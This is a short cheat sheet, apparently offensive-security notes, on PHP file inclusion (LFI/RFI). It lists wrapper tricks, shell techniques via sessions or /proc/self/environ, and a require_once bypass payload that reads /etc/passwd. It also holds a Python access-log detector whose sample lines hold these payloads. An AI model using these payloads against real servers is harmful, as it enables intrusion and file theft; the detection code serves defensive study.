# RFI/LFI PHP File Inclusion
# Special files
.htaccess
.user.ini
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
https://xz.aliyun.com/t/2657
# include
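- php://input + PHP code in the POST body (allow_url_include=On)
- data://text/plain,<phpcode> (allow_url_include=On)
- php7: php://filter/string.strip_tags=/etc/passwd
  This makes PHP hit a segmentation fault during execution. If a file is uploaded at the same time, its temporary file is kept in the /tmp directory and is not deleted. The file name has to be brute-forced: /tmp/phpxxxxx
- session + lfi getshell
- /proc/self/environ + UA header lfi getshell
- phar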
# require_once
- Repeated-inclusion PoC:
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/passwd
PHP source analysis: bypassing require_once's restriction on including the same file more than once: https://www.anquanke.com/post/id/213235
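
The wrappers and paths listed in the include and require_once sections above leave recognizable strings in request targets. The following Python detector is an added example, not code from the original notes; it assumes combined-format access logs and a hypothetical index.php?page= parameter, and its rule names and sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Indicators come from the notes above; rule names are this example's own.
RULES = [
    ("php_input", re.compile(r"php://input", re.I)),
    ("data_wrapper", re.compile(r"data://", re.I)),
    ("php_filter", re.compile(r"php://filter", re.I)),
    ("strip_tags_filter", re.compile(r"php://filter/\S*string\.strip_tags", re.I)),
    ("phar_wrapper", re.compile(r"phar://", re.I)),
    ("proc_environ", re.compile(r"/proc/self/environ")),
    ("proc_root_loop", re.compile(r"(?:/proc/self/root){2,}")),
    ("php_upload_tmp", re.compile(r"/tmp/php[A-Za-z0-9]{5,6}\b")),
]
# Combined log format: "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_LINE = re.compile(
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(line):
    """Return the sorted rule names hit by one access-log line."""
    m = LOG_LINE.search(line)
    if not m:
        return []
    target = decode(m.group("target"))
    hits = {name for name, rx in RULES if rx.search(target)}
    # The notes pair /proc/self/environ with the User-Agent header,
    # so a PHP open tag in that header is flagged as well.
    if "<?" in m.group("ua"):
        hits.add("php_in_user_agent")
    return sorted(hits)

# Constructed sample lines (documentation IP range, hypothetical page= parameter).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:00:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2024:00:00:02 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 12 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:00:00:03 +0000] "GET /index.php?page=php%3A%2F%2Ffilter%2Fstring.strip_tags%3D%2Fetc%2Fpasswd HTTP/1.1" 500 - "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:00:00:04 +0000] "GET /index.php?page=/proc/self/root/proc/self/root/etc/passwd HTTP/1.1" 200 900 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:00:00:05 +0000] "GET /index.php?page=%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 40 "-" "<?php /* constructed */ ?>"',
]
```

Calling scan() on each entry of SAMPLE returns the matched rule names; the last line is double URL-encoded and is still caught because decode() runs until the value stops changing.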
# file_get_contents/file
```php
<?php
$homepage = file_get_contents('http://www.example.com/');
echo $homepage;
?>
```
Some small tests on file_put_contents: https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/
# lfi -> rce
https://tttang.com/archive/1395/
# References
https://xz.aliyun.com/t/5535#toc-7
PHP file inclusion vulnerabilities: https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/